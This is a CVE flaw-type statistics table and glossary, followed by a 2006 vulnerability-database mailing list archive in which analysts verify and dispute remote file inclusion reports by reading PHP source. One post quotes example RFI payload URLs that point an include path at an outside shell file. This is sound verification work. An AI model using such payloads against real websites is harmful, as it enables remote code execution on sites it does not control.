01.7%......01.0% ( 7)03.4% ( 3)00.8% ( 8)04.2% ( 2)
[ 7]priv02.3%05.4% ( 4)01.8% ( 8)01.5% (12)01.2% (11)02.3% ( 5)02.2% ( 7)
01.8%01.9% ( 8)03.0% ( 6)...00.4% (16)03.4% ( 2)00.8% (13)
[ 8]perm02.2%05.4% ( 5)01.1% (13)01.9% ( 8)01.7% ( 7)02.3% ( 6)01.4% ( 9)
01.6%02.4% ( 6)03.3% ( 5)00.5% (11)00.4% (12)00.8% (12)01.8% ( 5)
[ 9]dot01.5%00.5% (18)01.8% ( 9)01.1% (15)02.0% ( 6)01.4% (12)01.6% ( 8)
01.2%01.9% (10)00.9% (13)01.0% ( 9)01.5% ( 7)00.5% (18)01.6% ( 7)
[10]infoleak01.1%00.5% (19)01.5% (12)01.1% (13)01.2% (12)01.0% (14)01.4% (10)
01.1%01.4% (12)00.9% (12)01.0% ( 8)00.4% (17)01.6% ( 5)01.1% (10)
[11]metachar01.5%03.2% ( 6)02.9% ( 5)01.5% (11)00.6% (15)01.4% (11)00.5% (15)
00.5%01.0% (18)01.2% (11)...00.4% (14)00.5% (15)...
[12]race01.4%02.3% ( 9)01.8% (10)00.4% (19)01.7% ( 8)01.6% ( 9)00.8% (13)
00.3%......00.5% (10)...00.8% (14)00.3% (21)
[13]sql-inject01.2%00.5% (21)00.7% (18)01.9% ( 9)00.9% (13)01.6% (10)01.4% (11)
00.4%...00.6% (18)00.5% (20)00.4% (13)...00.8% (14)
[14]memleak00.9%...00.7% (16)01.1% (14)01.4% ( 9)01.2% (13)00.3% (24)
00.9%04.3% ( 4)00.3% (19)00.5% (12)...00.8% (13)00.3% (19)
[15]crypt00.7%01.8% (11)00.7% (15)01.9% ( 7)...00.4% (18)00.3% (21)
00.9%01.0% (16)02.1% ( 7)...00.8% (11)00.5% (16)00.5% (15)
[16]sandbox00.2%00.5% (15)......00.3% (20)00.3% (23)...
01.4%05.3% ( 3)04.2% ( 3)............
[17]dos-flood00.3%01.4% (12)00.4% (24)......00.3% (24)...
01.1%03.9% ( 5)00.9% (14)00.5% (14)00.8% ( 9)00.3% (19)01.3% ( 8)
[18]relpath00.6%01.8% (10)00.7% (17)00.4% (18)00.3% (16)00.4% (19)00.5% (18)
00.7%01.4% (14)...00.5% (13)01.9% ( 6)...01.1% (12)
[19]auth00.1%00.5% (16)......00.3% (17)...00.3% (20)
01.2%02.4% ( 7)02.1% ( 8)01.5% ( 6)00.4% (15)01.0% ( 6)00.3% (18)
[20]pass00.0%............00.1% (28)...
01.1%00.5% (20)01.5% (10)00.5% (16)02.3% ( 4)00.8% (11)01.1% ( 9)
[21]signedness00.8%00.5% (17)01.8% (11)01.5% (10)00.3% (19)00.6% (17)00.5% (16)
00.2%......00.5% (17)...00.5% (17)...
[22]double-free00.6%...00.4% (22)01.1% (16)00.9% (14)00.3% (25)00.8% (12)
00.2%......00.5% (19)00.8% (10)00.3% (21)...
[23]spoof00.2%...00.7% (20)......00.4% (21)...
00.3%00.5% (23).........00.3% (20)01.1% (11)
[24]form-field00.4%00.5% (20)00.7% (19)00.4% (20)...00.7% (16)...
00.1%00.5% (21)...............
[25]crlf00.5%...01.1% (14)......00.7% (15)00.5% (17)
00.0%..................
[26]rand00.2%00.9% (13)00.4% (21)00.4% (17)......00.3% (22)
00.3%01.9% ( 9)00.3% (22)............
[27]default00.1%.........00.3% (18)...00.3% (23)
00.4%00.5% (24)00.6% (16)......00.8% ( 9)00.3% (16)
[28]dos-release00.1%00.5% (22)00.4% (23)00.4% (21).........
00.2%01.4% (11)00.3% (21)............
[29]type-check00.0%............00.1% (26)...
00.3%01.4% (15)00.9% (15)............
[30]CF00.1%00.9% (14)...............
00.2%01.0% (19)...00.5% (18)......00.3% (22)
[31]eval-inject00.2%............00.4% (20)00.5% (14)
00.0%..................
[32]php-include00.2%............00.4% (22)00.3% (19)
00.0%..................
[33]design00.0%..................
00.2%00.5% (25)00.3% (20)00.5% (15)...00.3% (22)...
[34]webroot00.0%..................
00.1%...............00.3% (20)
[35]upload00.0%............00.1% (29)...
00.0%..................
[36]CSRF00.0%............00.1% (27)...
00.0%..................
UNKNOWN/UNSPECIFIED ITEMS
n/a unk09.7%12.2%10.3%04.5%07.8%11.5%10.1%
25.7%13.0%15.7%20.1%23.0%26.9%45.0%
n/a other19.3%13.1%20.6%15.7%10.4%15.9%39.4%
12.4%18.8%12.7%05.0%14.9%10.7%12.4%
n/a not-specified13.4%00.0%04.4%21.6%21.9%20.5%00.8%
13.2%00.5%06.3%28.6%22.6%24.3%00.5%

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top nTOTAL200120022003200420052006
537.553.742.639.345.532.233.4
31.54346.936.130.227.729.4
1047.666.453.149.153.741.642.4
38.553.557.441.13631.936.1


Flaw Terminology

TypeDescription
auth Weak/bad authentication problem (CWE: CWE-289, CWE-288, CWE-302, CWE-305, CWE-294, CWE-290, CWE-287, CWE-303)
buf Buffer overflow (CWE: CWE-119, CWE-120)
CF General configuration problem, not perm or default (CWE: none)
crlf CRLF injection (CWE: CWE-93)
crypt Cryptographic error (poor design or implementation), including plaintext storage/transmission of sensitive information. (CWE: CWE-310, CWE-311, CWE-347, CWE-320, CWE-325)
CSRF Cross-Site Request Forgery (CSRF) (CWE: CWE-352)
default Insecure default configuration, e.g., passwords or permissions (CWE: N/A)
design Design problem, generally in protocols or programming languages. Since 2005, its use has been limited due to the highly general nature of this type. (CWE: none)
dos-flood DoS caused by flooding with a large number of *legitimately formatted* requests/etc.; normally DoS is a crash, or spending a lot more time on a task than it "should" (CWE: CWE-400)
dos-malform DoS caused by malformed input (CWE: CWE-238, CWE-234, CWE-166, CWE-230, many others)
dos-release DoS because system does not properly release resources (CWE: CWE-404)
dot Directory traversal (file access via ".." or variants) (CWE: CWE-22, CWE-23, CWE-36)
double-free Double-free vulnerability (CWE: CWE-415)
eval-inject Eval injection (CWE: CWE-95)
form-field CGI program inherently trusts form field that should not be modified (i.e., should be stored locally) (CWE: CWE-472)
format-string Format string vulnerability; user can inject format specifiers during string processing. (CWE: CWE-134)
infoleak Information leak by a product, which is not the result of another vulnerability; typically by design or by producing different "answers" that suggest the state; often related to configuration / permissions or error reporting/handling. (CWE: CWE-205, CWE-212, CWE-203, CWE-209, CWE-207, CWE-200, CWE-215, others)
int-overflow A numeric value can be incremented to the point where it overflows and begins at the minimum value, with security implications. Overlaps signedness errors. (CWE: CWE-190)
link Symbolic link following (CWE: CWE-61, CWE-64)
memleak Memory leak (doesn't free memory when it should); use this instead of dos-release (CWE: CWE-401)
metachar Unescaped shell metacharacters or other unquoted "special" char's; currently includes SQL injection but not XSS. (CWE: CWE-78)
msdos-device Problem due to file names with MS-DOS device names. (CWE: CWE-67)
not-specified The CVE analyst has not assigned a flaw type to the issue, typically similar to "other". (CWE: none)
other Other vulnerability; issue could not be described with an available type at the time of analysis. (CWE: none)
pass Default or hard-coded password (CWE: CWE-259)
perm Assigns bad permissions, improperly calculates permissions, or improperly checks permissions (CWE: CWE-276)
php-include PHP remote file inclusion (CWE: CWE-98)
priv Bad privilege assignment, or privileged process/action is unprotected/unauthenticated. (CWE: CWE-266, CWE-274, CWE-272, CWE-250, CWE-264, CWE-265, CWE-268, CWE-270, CWE-271, CWE-269, CWE-267)
race General race condition (NOT SYMBOLIC LINK FOLLOWING (link)!) (CWE: CWE-362, CWE-366, CWE-364, CWE-367, CWE-421, CWE-368, CWE-363, CWE-370)
rand Generation of insufficiently random numbers, typically by using easily guessable sources of "random" data (CWE: CWE-330, CWE-331, CWE-332, CWE-338, CWE-342, CWE-341, CWE-339, others)
relpath Untrusted search path vulnerability - Relies on search paths to find other executable programs or files, opening up to Trojan horse attacks, e.g., PATH environment variable in Unix. (CWE: CWE-426, CWE-428, CWE-114)
sandbox Java/etc. sandbox escape - NOT BY DOT-DOT! (CWE: CWE-265)
signedness Signedness error; a numeric value in one format/representation is improperly handled when it is used as if it were another format/representation. Overlaps integer overflows and array index errors. (CWE: CWE-195, CWE-196)
spoof Product is vulnerable to spoofing attacks, generally by not properly verifying authenticity. (CWE: CWE-290, CWE-350, CWE-347, CWE-345, CWE-247, CWE-292, CWE-291)
sql-inject SQL injection vulnerability (CWE: CWE-89)
type-check Product incorrectly identifies the type of an input parameter or file, then dispatches the wrong "executable" (possibly itself) to process the input, or otherwise misrepresents the input in a security-critical way. (CWE: unknown)
unk Unknown vulnerability; report is too vague to determine type of issue. (CWE: none)
upload Product does not restrict the extensions for files that can be uploaded to the web server, leading to code execution if executable extensions are used in filenames, such as .asp, .php, and .shtml. (CWE: CWE-434)
webroot Storage of sensitive data under web document root with insufficient access control. (CWE: CWE-219, CWE-433)
XSS Cross-site scripting (aka XSS) (CWE: CWE-79, CWE-80, CWE-87, CWE-85, CWE-82, CWE-81, CWE-83, CWE-84)
From jericho at attrition.org Thu Oct 5 04:57:27 2006 From: jericho at attrition.org (security curmudgeon) Date: Thu, 5 Oct 2006 04:57:27 -0400 (EDT) Subject: [VIM] CVE-2006-4030 - Gallery Stats Module Message-ID: Finally! This CVE has been locked for ages now, taunting me on the OSVDB backend.. waiting to find out what it cross references to =) CVE-2006-4030 Unspecified vulnerability in the stats module in Gallery 1.5.1-RC2 and earlier allows remote attackers to obtain sensitive information via unspecified attack vectors, related to "two file exposure bugs." Based on "Gallery" + "Stats Module" + "1.5.1-RC2", this should track to OSVDB 19159: 19159: The Gallery Stats Module Unspecified File Disclosure 2005-09-01 http://gallery.sourceforge.net/ http://cvs.sourceforge.net/viewcvs.py/gallery/gallery/ChangeLog?rev=HEAD&content-type=text/vnd.viewcvs-markup Changelog: 2005-08-24 Jay Rossiter 1.5.1-RC3-cvs-b13 * Fix: Prevent file exposure bug in stats module (thanks to ilia) -- Now, CVE-2006-4030 says "two file exposure bugs" and the changelog says "file exposure bug" (singular). Looking at the debian bug report we see: Date: Sat, 27 Aug 2005 17:21:56 +0000 Changes: gallery (1.5-2) unstable; urgency=high * SECURITY: + Fix two file exposure bugs in stats module. So.. i'd hazard a guess that the Gallery developers/author noticed one file exposure bug back on 2005-08-24 and fixed it, but a closer inspection a few days later found a second? Also, CVE-2006-4030 tracks to Secunia 16594 which mentions a single file disclosure vuln. So, for OSVDB, i'm keeping our 19159 entry to track to the first of the two issues, dated 2005-08-24 (changelog), and creating a new one (29350) that will cross with CVE-2006-4030 dated 2005-08-27 (other changelog/debian bug comment). From coley at linus.mitre.org Fri Oct 6 14:08:09 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 6 Oct 2006 14:08:09 -0400 (EDT) Subject: [VIM] WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit (fwd) Message-ID: ---------- Forwarded message ---------- Date: Fri, 6 Oct 2006 14:05:11 -0400 (EDT) From: Steven M. Christey To: bugtraq at securityfocus.com Subject: Re: WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit There are some important errors in this post that appear to stem from incomplete editing of a previous advisory for an unrelated product, webnews (CVE-2006-5100). The subject line says 1.4, but the version referenced at the end of the post is 1.2.3, which is dated October 2, 2006; so there doesn't appear to be any 1.4. The subject line also mentions WN_BASEDIR, but the demonstration exploit uses includeDir instead. - Steve From coley at linus.mitre.org Mon Oct 9 12:27:24 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 9 Oct 2006 12:27:24 -0400 (EDT) Subject: [VIM] Concerning CVE-2006-5078 (fwd) Message-ID: FYI, also: http://sourceforge.net/forum/forum.php?forum_id=620481 ---------- Forwarded message ---------- Date: Mon, 09 Oct 2006 14:37:32 +0000 From: Kristian Niemi To: cve at mitre.org Subject: Concerning CVE-2006-5078 Hi, Just saw the vulnerability report (CVE-2006-5078) concerning my project, Polaring. As of 00.04.04, released today, this should be fixed. /Kristian From coley at linus.mitre.org Mon Oct 9 15:30:19 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 9 Oct 2006 15:30:19 -0400 (EDT) Subject: [VIM] net2ftp: a web based FTP client :) <= Remote File Inclusion (fwd) Message-ID: CVE dispute, but with a little more detail than "there's no issue." File this under the growing collection of "really bad research or really obscure PHP bug". - Steve ---------- Forwarded message ---------- Date: Mon, 9 Oct 2006 15:26:20 -0400 (EDT) From: Steven M. Christey To: securfrog at gmail.com Cc: bugtraq at securityfocus.com Subject: Re: net2ftp: a web based FTP client :) <= Remote File Inclusion securfrog said: > i guess you should learn some PHP before posting on bugtracks ... > >" net2ftp: a web based FTP client :) <= Remote File Inclusion " > >===> you should try your PoC before posting , there's no remote file >include in that code ... You are probably looking at recent versions, which don't have the affected code at all. The statements as quoted by the original researcher *do* appear in versions of net2ftp before 0.7: ./net2ftp_v0.1/index.php:require_once($application_rootdir . "/includes/browse.inc.php"); ./net2ftp_v0.2/index.php:require_once($application_rootdir . "/includes/browse.inc.php"); ./net2ftp_v0.3/index.php:require_once($application_rootdir . "/includes/browse.inc.php"); ./net2ftp_v0.4/index.php:require_once($application_rootdir . "/includes/browse.inc.php"); ./net2ftp_v0.6/index.php:require_once($application_rootdir . "/includes/browse.inc.php"); ./net2ftp_v0.62/index.php:require_once($application_rootdir . "/includes/browse.inc.php"); ./net2ftp_v0.61/index.php:require_once($application_rootdir . "/includes/browse.inc.php"); ./net2ftp_v0.7/index.php:require_once("./includes/browse.inc.php"); Notice how 0.7 doesn't use $application_rootdir. For these older versions, we need to figure out where $application_rootdir came from and if it's controlled by the attacker at all. In net2ftp_v0.62, settings.inc.php is included by index.php before $application_rootdir, and settings.inc.php has: $application_rootdir = dirname(__FILE__); So, $application_rootdir should already be defined. In 0.1, settings.inc.php has: $server_rootdir = "/var/www/php/net2ftp"; // <-- The directory in which the net2ftp application files reside ... $application_extension = ""; // (Do not use this, it is only for development purposes) ... $application_rootdir = $server_rootdir . $application_extension; So, $application_rootdir is defined in 0.1, too. Given the large number of reports like this, it's not clear whether a bunch of researchers are making erroneous grep-and-gripe claims without checking their work, or if there's some obscure PHP scoping bug that somehow allows variables to be overwritten in weird ways. I haven't completely ruled out the latter but don't have any hard proof, either. - Steve From coley at linus.mitre.org Mon Oct 9 15:53:34 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 9 Oct 2006 15:53:34 -0400 (EDT) Subject: [VIM] net2ftp: a web based FTP client :) <= Remote File Inclusion (fwd) In-Reply-To: References: Message-ID: Just to make the plot thicker: http://www.net2ftp.org/forums/viewtopic.php?pid=6687 The vendor says "These reports are based on net2ftp versions 0.60 to 0.62, which were released more than 3 years ago, in May-July 2003. The newer versions of net2ftp are not vulnerable to a remote file inclusion." Then the code for admin/index.php (not the original index.php) is apparently listed. It's not clear whether the vendor is actually acknowledging the issue, or just saying "the newer versions don't have it." I sucked it up, registered, and posted the following inquiry: Hello, I am the lead for the CVE vulnerability project. We assigned CVE-2006-5097 to this issue. Isn't $application_rootdir already defined in "settings.inc.php", which is included by index.php? So how could an attacker actually modify $application_rootdir ? It's not clear to me where the vulnerability is. - Steve From coley at mitre.org Tue Oct 10 14:17:53 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 10 Oct 2006 14:17:53 -0400 (EDT) Subject: [VIM] CVE-2006-5158 (NFS lockd in Linux) - more than SUSE Message-ID: <200610101817.k9AIHrqf023647@faron.mitre.org> FYI, this was originally thought to be SUSE-specific based on CVE's interpretation of SUSE'S advisory text, but we were just notified that this affects the kernel itself, so other distros may be affected as well. This was not originally presented as an attacker-controllable DoS, which is why the original post/patch dates are so old. The current CVE desc tries to resolve why SuSE said "deadlock" from the "oops" in the patch, but it's a bit of a guess. - Steve ====================================================== Name: CVE-2006-5158 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158 Reference: MLIST:[linux-kernel] 20051216 lockd: couldn't create RPC handle for (host) Reference: URL:http://marc.theaimsgroup.com/?l=linux-kernel&m=113476665626446&w=2 Reference: MLIST:[linux-kernel] 20051218 Re: lockd: couldn't create RPC handle for (host) Reference: URL:http://marc.theaimsgroup.com/?l=linux-kernel&m=113494474208973&w=2 Reference: CONFIRM:http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=9b5b1f5bf9dcdb6f23abf65977a675eb4deba3c0 Reference: SUSE:SUSE-SA:2006:057 Reference: URL:http://www.novell.com/linux/security/advisories/2006_57_kernel.html The nlmclnt_mark_reclaim in clntlock.c in NFS lockd in Linux kernel before 2.6.16 allows remote attackers to cause a denial of service (process crash) and deny access to NFS exports via unspecified vectors that trigger a kernel oops (null dereference) and a deadlock. From coley at mitre.org Tue Oct 10 18:56:09 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 10 Oct 2006 18:56:09 -0400 (EDT) Subject: [VIM] phpWebSite 0.10.2 RFI - CVE dispute Message-ID: <200610102256.k9AMu9tk028838@faron.mitre.org> Researcher: Crackers_Child (which is why I looked closer) Reference: phpWebSite 0.10.2 Remote File Include Vulnerabilities http://www.securityfocus.com/archive/1/archive/1/448098/100/0/threaded I downloaded the same software version, as specified in the URL provided by Crackers_Child, and took a look. Example exploits: > mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt? If we look at init.php, we see: require(PHPWS_SOURCE_DIR."mod/users/class/Cookie.php"); require(PHPWS_SOURCE_DIR."mod/users/class/ModSetting.php"); require(PHPWS_SOURCE_DIR."mod/users/class/Forms.php"); require(PHPWS_SOURCE_DIR."mod/users/class/Groups.php"); and nothing else. So, we have a PHP constant. Can't be controlled, right? > mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt? Actually it's spelled "Users.php" Anyway, we have things like this: require_once(PHPWS_SOURCE_DIR . 'core/Error.php'); for users/class/Cookie.php: require_once(PHPWS_SOURCE_DIR.'core/Form.php'); going to core/EZform.php: require_once PHPWS_SOURCE_DIR . "core/EZelement.php"; A grep for PHPWS_SOURCE_DIR returns 799 matches, almost all of which are of the forms above, and one or two define's of the constant. There is no evidence of any use of $_GET, $PHPWS_SOURCE_DIR, etc. - Steve From smoore at securityglobal.net Tue Oct 10 23:44:06 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 10 Oct 2006 23:44:06 -0400 Subject: [VIM] Advanced Poll v2.02 :) <= Remote File Inclusion Message-ID: <452C6886.4060009@securityglobal.net> Apparently a repeat of CVE-2003-1178. > From: alguidy at hotmail.com > Subject: Advanced Poll v2.02 :) <= Remote File Inclusion > Date: 8 Oct 2006 14:30:29 -0000 From smoore at securityglobal.net Tue Oct 10 23:48:25 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 10 Oct 2006 23:48:25 -0400 Subject: [VIM] The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit Message-ID: <452C6989.9040100@securityglobal.net> At least in "index.php" there is this (preventing user specification of isearch_path): > $isearch_path = dirname(__FILE__); Didn't check the others. Stuart > From: xp1o at msn.com > Subject: The latest version of iSearch is V2.16 <= (index.php) > Remote File Inclusion Exploit > Date: 7 Oct 2006 22:14:00 -0000 From smoore at securityglobal.net Tue Oct 10 23:49:53 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 10 Oct 2006 23:49:53 -0400 Subject: [VIM] The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit In-Reply-To: <452C6989.9040100@securityglobal.net> References: <452C6989.9040100@securityglobal.net> Message-ID: <452C69E1.6030609@securityglobal.net> Sorry, I didn't see that str0ke posted this same info to bugtraq already. Stuart Stuart Moore wrote: > At least in "index.php" there is this (preventing user specification of > isearch_path): > > > $isearch_path = dirname(__FILE__); > > Didn't check the others. > > Stuart > > > > > > > From: xp1o at msn.com > > Subject: The latest version of iSearch is V2.16 <= (index.php) > > Remote File Inclusion Exploit > > Date: 7 Oct 2006 22:14:00 -0000 > > From coley at mitre.org Wed Oct 11 18:07:30 2006 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Oct 2006 18:07:30 -0400 (EDT) Subject: [VIM] Source VERIFY of tagit2b delTagUser.php RFI Message-ID: <200610112207.k9BM7Ubc022340@faron.mitre.org> Researcher: k1tk4t at newhack.org Post: BUGTRAQ:20061010 tagit2b -- Remote File Inclusion http://www.securityfocus.com/archive/1/archive/1/448173/100/0/threaded I downloaded the source as specified by the researcher. Relevant code from the top of delTagUser.php (some whitespace removed): Researcher: CvIr.System Reference: BUGTRAQ:20061013 CMS contenido Remote File Inclusion http://www.securityfocus.com/archive/1/archive/1/448549/100/0/threaded I was investigating whether this was a rediscovery of CVE-2005-4132, but CVE-2005-4132 comes from a vague vendor disclosure that doesn't have any vector information. So after a couple minutes' investigation, I wasn't sure if this was really new or not. Downloading the code from: http://www.contenido.org/opensourcecms/en/index-a-104.html I got Stable Version 4.6.15. It looks like config.php sets $contenido_path to a static value: $contenido_path = "../contenido/"; and config.php is included before the claimed-vulnerable code: from cms/dbfs.php: include_once ("config.php"); include_once ($contenido_path . "includes/startup.php"); from cms/front_content.php: include_once ("config.php"); # Contenido startup process include_once ($contenido_path."includes/startup.php"); No other code in the cms/ directory has an include that uses $contenido_path. So, this looks like an incorrect report. - Steve From coley at mitre.org Tue Oct 17 22:13:15 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 17 Oct 2006 22:13:15 -0400 (EDT) Subject: [VIM] SecureWorks Research Client Advisory: Multiple Vendor Bluetooth Memory Stack Corruption Vulnerability Message-ID: <200610180213.k9I2DFoo024483@faron.mitre.org> ** working notes - been a long day and if someone wants to follow through, I'd appreciate it ** The SecureWorks advisory speaks of a "flaw" and "memory stack corruption" but do not refer to this as a buffer overflow. The affected driver versions go up to 4.00.35. They include this as a cross-reference: Buffer Overrun in Toshiba Bluetooth Stack for Windows http://trifinite.org/trifinite_advisory_toshiba.html This document, published in June, only specifies versions up to 4.0.23, and it specifically states that there is a buffer overflow, and it even lists the attack vectors involving L2CAP Echo Requests. So - is there one bug or 2? The Toshiba URL they refer to includes a "PC Bluetooth Stack Security Patch 2" whose Details document says "Fix L2CAP echo issue" (it also mentions OBEX directory traversal but that is outside this particular discussion). There's also a "PC Bluetooth Stack" section whose Details document says "Security fix", but the phrase "Bluetooth Stack 4.00.36(T)" seems to imply that 4.00.36 is also affected, which is inconsistent with the SecureWorks advisory. Thoughts? - Steve From jericho at attrition.org Wed Oct 18 01:24:15 2006 From: jericho at attrition.org (security curmudgeon) Date: Wed, 18 Oct 2006 01:24:15 -0400 (EDT) Subject: [VIM] 28547: Web Dictate Null Password Authentication Bypass (fwd) Message-ID: ---------- Forwarded message ---------- From: Peter Lupton NCH Swift Sound To: moderators at osvdb.org Date: Wed, 18 Oct 2006 15:22:30 +1000 Reply-To: moderators at osvdb.org Subject: [OSVDB Mods] [Change Request] 28547: Web Dictate Null Password Authentication Bypass Can you please note a remedy on: http://www.osvdb.org/28547 That is to download the release version from: http://www.nch.com.au/webdictate/index.html The security issue noted on your site only applied to the beta version of 1.02. Release versions and later versions do not have this issue. Peter Lupton NCH Swift Sound Unit 13, Level 3 28 University Avenue GPO Box 1169 Canberra ACT 2601 Australia www.nch.com.au From smoore at securityglobal.net Wed Oct 18 22:58:45 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Wed, 18 Oct 2006 22:58:45 -0400 Subject: [VIM] CVE-2006-5402, fishy? Message-ID: <4536E9E5.8040707@securityglobal.net> Based on a not-quite-complete analysis, this one looks suspicious: I can't find a copy of version 2.1. However, in looking at newer versions (2.1.29 and 3.0.1) and in looking at old code from CVS, it appears that $include_path is specified. In version 2.1.29, the 'index.php' script (v 1.10 2005/09/19 13:42:00) says: include_once ("./includes/config.inc.php"); And the 'config.inc.php' script (v 1.50.2.24 2006/09/30 11:01:16) says: $class_path = 'classes'; // classes So that should prevent any attack via 'class_path' in 2.1.29. And checking the earlier code from the now defunct CVS repository on sourceforge (circa release 1.0 time frame): index.php,v 1.29 2004/01/13 06:39:29: 10 include ("./includes/error_report.inc.php") ; 11 include ("./includes/global_vars.inc.php") ; 12 include ("./includes/config.inc.php"); cart.php,v 1.21 2004/04/06 08:11:03: 10 $base_path="."; 11 $base_auth = ""; 12 $base_title = "\$msg[396]"; 13 require_once ("$base_path/includes/init.inc.php"); 14 15 // modules propres ? cart.php ou ? ses sous-modules 16 include("$include_path/cart.inc.php"); init.inc.php,v 1.14 2004/03/02 09:12:56: 35 include ("$base_path/includes/error_report.inc.php") ; 36 include ("$base_path/includes/global_vars.inc.php") ; 37 require("$base_path/includes/config.inc.php"); 38 39 // prevents direct script access 40 if(preg_match('/init\.inc\.php/', $REQUEST_URI)) { 41 include('forbidden.inc.php'); forbidden(); 42 } 43 44 $include_path = $base_path."/".$include_path; 45 $class_path = $base_path."/".$class_path; config.inc.php,v 1.28 2003/12/22 13:52:12: 134 $include_path = 'includes'; // includes 135 $class_path = 'classes'; // classes So, that should prevent attacks via include_path or class_path. I've written to the vendor for confirmation. Stuart From smoore at securityglobal.net Thu Oct 19 07:10:27 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Thu, 19 Oct 2006 07:10:27 -0400 Subject: [VIM] CVE-2006-5402, fishy? In-Reply-To: <4536E9E5.8040707@securityglobal.net> References: <4536E9E5.8040707@securityglobal.net> Message-ID: <45375D23.1020107@securityglobal.net> Well, the vendor says that version 3.01 is indeed vulnerable. There is a patch at: http://www.sigb.net/patch.php Stuart Stuart Moore wrote: > Based on a not-quite-complete analysis, this one looks suspicious: > > I can't find a copy of version 2.1. However, in looking at newer > versions (2.1.29 and 3.0.1) and in looking at old code from CVS, it > appears that $include_path is specified. > > In version 2.1.29, the 'index.php' script (v 1.10 2005/09/19 13:42:00) > says: > > include_once ("./includes/config.inc.php"); > > And the 'config.inc.php' script (v 1.50.2.24 2006/09/30 11:01:16) says: > > $class_path = 'classes'; // classes > > So that should prevent any attack via 'class_path' in 2.1.29. > > And checking the earlier code from the now defunct CVS repository on > sourceforge (circa release 1.0 time frame): > > index.php,v 1.29 2004/01/13 06:39:29: > > 10 include ("./includes/error_report.inc.php") ; > 11 include ("./includes/global_vars.inc.php") ; > 12 include ("./includes/config.inc.php"); > > cart.php,v 1.21 2004/04/06 08:11:03: > > 10 $base_path="."; > 11 $base_auth = ""; > 12 $base_title = "\$msg[396]"; > 13 require_once ("$base_path/includes/init.inc.php"); > 14 > 15 // modules propres ? cart.php ou ? ses sous-modules > 16 include("$include_path/cart.inc.php"); > > init.inc.php,v 1.14 2004/03/02 09:12:56: > > 35 include ("$base_path/includes/error_report.inc.php") ; > 36 include ("$base_path/includes/global_vars.inc.php") ; > 37 require("$base_path/includes/config.inc.php"); > 38 > 39 // prevents direct script access > 40 if(preg_match('/init\.inc\.php/', $REQUEST_URI)) { > 41 include('forbidden.inc.php'); forbidden(); > 42 } > 43 > 44 $include_path = $base_path."/".$include_path; > 45 $class_path = $base_path."/".$class_path; > > config.inc.php,v 1.28 2003/12/22 13:52:12: > > 134 $include_path = 'includes'; // includes > 135 $class_path = 'classes'; // classes > > So, that should prevent attacks via include_path or class_path. > > I've written to the vendor for confirmation. > > Stuart > > From coley at mitre.org Fri Oct 20 19:32:43 2006 From: coley at mitre.org (Steven M. Christey) Date: Fri, 20 Oct 2006 19:32:43 -0400 (EDT) Subject: [VIM] vendor ACK for old YPOPs! issue Message-ID: <200610202332.k9KNWhmS005148@faron.mitre.org> Reference: CVE-2004-1558 ACK: http://dbeusee.home.comcast.net/history.html (this is only intended to be within a frame; home site is http://dbeusee.home.comcast.net) The vendor changelog "Version 0.6.1216 (16th December 2004) BETA" says "Fixed the security issues raised in the following advisory" and references BID:11256 and the hat-squad MISC. - Steve ====================================================== Name: CVE-2004-1558 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1558 Reference: BUGTRAQ:20040927 [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS Reference: URL:http://marc.theaimsgroup.com/?l=bugtraq&m=109630699829536&w=2 Reference: MISC:http://www.hat-squad.com/en/000075.html Reference: BID:11256 Reference: URL:http://www.securityfocus.com/bid/11256 Reference: SECTRACK:1011426 Reference: URL:http://securitytracker.com/alerts/2004/Sep/1011426.html Reference: XF:ypops-pop3-bo(17515) Reference: URL:http://xforce.iss.net/xforce/xfdb/17515 Reference: XF:ypops-smtp-bo(17518) Reference: URL:http://xforce.iss.net/xforce/xfdb/17518 Multiple stack-based buffer overflows in YahooPOPS (YPOPs) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request. From heinbockel at mitre.org Mon Oct 23 09:43:26 2006 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Mon, 23 Oct 2006 09:43:26 -0400 Subject: [VIM] PHP file inclusions in PHP Developer Library 1.5.3 (some disputed) Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0146D456@IMCSRV5.MITRE.ORG> In the past 2 weeks there have been 3 separate issues involving the Softerra PHP Developer Library 1.5.3: (1) http://www.milw0rm.com/exploits/2511 (2) http://www.milw0rm.com/exploits/2520 (3) BUGTRAQ:20061020 PHPLibrary-1.5.3(Description.php) Remote File Include http://www.securityfocus.com/archive/1/archive/1/449355/100/0/threaded Upon brief source code inspection, the first two appear to be legitimate. DISPUTED The third issue, appears to be a lack of research on the part of the reporter (due to grep or Google Code Search). The distribution as of 20061023 does not contain a file called Description.php. It does, however, contain a Description file (no file extension) which does contain the reported line (line 253): > include ($lib_dir . "sqlstorage.class.php"); However there is no clear way to get this file to be handled by the PHP interpreter (mod_php or similar). William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 